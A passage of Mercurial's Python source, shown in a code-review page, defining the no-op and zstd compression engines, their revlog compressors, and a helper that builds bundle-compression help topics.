3589 3589 return compewireprotosupport('none', 0, 10)
3590 3590
3591 3591 # We don't implement revlogheader because it is handled specially
3592 3592 # in the revlog class.
3593 3593
3594 3594 def compressstream(self, it, opts=None):
3595 3595 return it
3596 3596
3597 3597 def decompressorreader(self, fh):
3598 3598 return fh
3599 3599
3600 3600 class nooprevlogcompressor(object):
3601 3601 def compress(self, data):
3602 3602 return None
3603 3603
3604 3604 def revlogcompressor(self, opts=None):
3605 3605 return self.nooprevlogcompressor()
3606 3606
3607 3607 compengines.register(_noopengine())
3608 3608
3609 3609 class _zstdengine(compressionengine):
3610 3610 def name(self):
3611 3611 return 'zstd'
3612 3612
3613 3613 @propertycache
3614 3614 def _module(self):
3615 3615 # Not all installs have the zstd module available. So defer importing
3616 3616 # until first access.
3617 3617 try:
3618 3618 from . import zstd
3619 3619 # Force delayed import.
3620 3620 zstd.__version__
3621 3621 return zstd
3622 3622 except ImportError:
3623 3623 return None
3624 3624
3625 3625 def available(self):
3626 3626 return bool(self._module)
3627 3627
3628 3628 def bundletype(self):
3629 3629 """A modern compression algorithm that is fast and highly flexible.
3630 3630
3631 3631 Only supported by Mercurial 4.1 and newer clients.
3632 3632
3633 3633 With the default settings, zstd compression is both faster and yields
3634 3634 better compression than ``gzip``. It also frequently yields better
3635 3635 compression than ``bzip2`` while operating at much higher speeds.
3636 3636
3637 3637 If this engine is available and backwards compatibility is not a
3638 3638 concern, it is likely the best available engine.
3639 3639 """
3640 3640 return 'zstd', 'ZS'
3641 3641
3642 3642 def wireprotosupport(self):
3643 3643 return compewireprotosupport('zstd', 50, 50)
3644 3644
3645 3645 def revlogheader(self):
3646 3646 return '\x28'
3647 3647
3648 3648 def compressstream(self, it, opts=None):
3649 3649 opts = opts or {}
3650 3650 # zstd level 3 is almost always significantly faster than zlib
3651 3651 # while providing no worse compression. It strikes a good balance
3652 3652 # between speed and compression.
3653 3653 level = opts.get('level', 3)
3654 3654
3655 3655 zstd = self._module
3656 3656 z = zstd.ZstdCompressor(level=level).compressobj()
3657 3657 for chunk in it:
3658 3658 data = z.compress(chunk)
3659 3659 if data:
3660 3660 yield data
3661 3661
3662 3662 yield z.flush()
3663 3663
3664 3664 def decompressorreader(self, fh):
3665 3665 zstd = self._module
3666 3666 dctx = zstd.ZstdDecompressor()
3667 3667 return chunkbuffer(dctx.read_from(fh))
3668 3668
3669 3669 class zstdrevlogcompressor(object):
3670 3670 def __init__(self, zstd, level=3):
3671 3671 # Writing the content size adds a few bytes to the output. However,
3672 3672 # it allows decompression to be more optimal since we can
3673 3673 # pre-allocate a buffer to hold the result.
3674 3674 self._cctx = zstd.ZstdCompressor(level=level,
3675 3675 write_content_size=True)
3676 3676 self._dctx = zstd.ZstdDecompressor()
3677 3677 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3678 3678 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3679 3679
3680 3680 def compress(self, data):
3681 3681 insize = len(data)
3682 3682 # Caller handles empty input case.
3683 3683 assert insize > 0
3684 3684
3685 3685 if insize < 50:
3686 3686 return None
3687 3687
3688 3688 elif insize <= 1000000:
3689 3689 compressed = self._cctx.compress(data)
3690 3690 if len(compressed) < insize:
3691 3691 return compressed
3692 3692 return None
3693 3693 else:
3694 3694 z = self._cctx.compressobj()
3695 3695 chunks = []
3696 3696 pos = 0
3697 3697 while pos < insize:
3698 3698 pos2 = pos + self._compinsize
3699 3699 chunk = z.compress(data[pos:pos2])
3700 3700 if chunk:
3701 3701 chunks.append(chunk)
3702 3702 pos = pos2
3703 3703 chunks.append(z.flush())
3704 3704
3705 3705 if sum(map(len, chunks)) < insize:
3706 3706 return ''.join(chunks)
3707 3707 return None
3708 3708
3709 3709 def decompress(self, data):
3710 3710 insize = len(data)
3711 3711
3712 3712 try:
3713 3713 # This was measured to be faster than other streaming
3714 3714 # decompressors.
3715 3715 dobj = self._dctx.decompressobj()
3716 3716 chunks = []
3717 3717 pos = 0
3718 3718 while pos < insize:
3719 3719 pos2 = pos + self._decompinsize
3720 3720 chunk = dobj.decompress(data[pos:pos2])
3721 3721 if chunk:
3722 3722 chunks.append(chunk)
3723 3723 pos = pos2
3724 3724 # Frame should be exhausted, so no finish() API.
3725 3725
3726 3726 return ''.join(chunks)
3727 3727 except Exception as e:
3728 3728 raise error.RevlogError(_('revlog decompress error: %s') %
3729 3729 str(e))
3730 3730
3731 3731 def revlogcompressor(self, opts=None):
3732 3732 opts = opts or {}
3733 3733 return self.zstdrevlogcompressor(self._module,
3734 3734 level=opts.get('level', 3))
3735 3735
3736 3736 compengines.register(_zstdengine())
3737 3737
3738 3738 def bundlecompressiontopics():
3739 3739 """Obtains a list of available bundle compressions for use in help."""
3740 3740 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3741 3741 items = {}
3742 3742
3743 3743 # We need to format the docstring. So use a dummy object/type to hold it
3744 3744 # rather than mutating the original.
3745 3745 class docobject(object):
3746 3746 pass
3747 3747
3748 3748 for name in compengines:
3749 3749 engine = compengines[name]
3750 3750
3751 3751 if not engine.available():
3752 3752 continue
3753 3753
3754 3754 bt = engine.bundletype()
3755 3755 if not bt or not bt[0]:
3756 3756 continue
3757 3757
3758 3758 doc = pycompat.sysstr('``%s``\n %s') % (
3759 3759 bt[0], engine.bundletype.__doc__)
3760 3760
3761 3761 value = docobject()
3762 3762 value.__doc__ = doc
3763 3763 value._origdoc = engine.bundletype.__doc__
3764 3764 value._origfunc = engine.bundletype
3765 3765
3766 3766 items[bt[0]] = value
3767 3767
3768 3768 return items
3769 3769
3770 3770 i18nfunctions = bundlecompressiontopics().values()
3771 3771
3772 3772 # convenient shortcut
3773 3773 dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now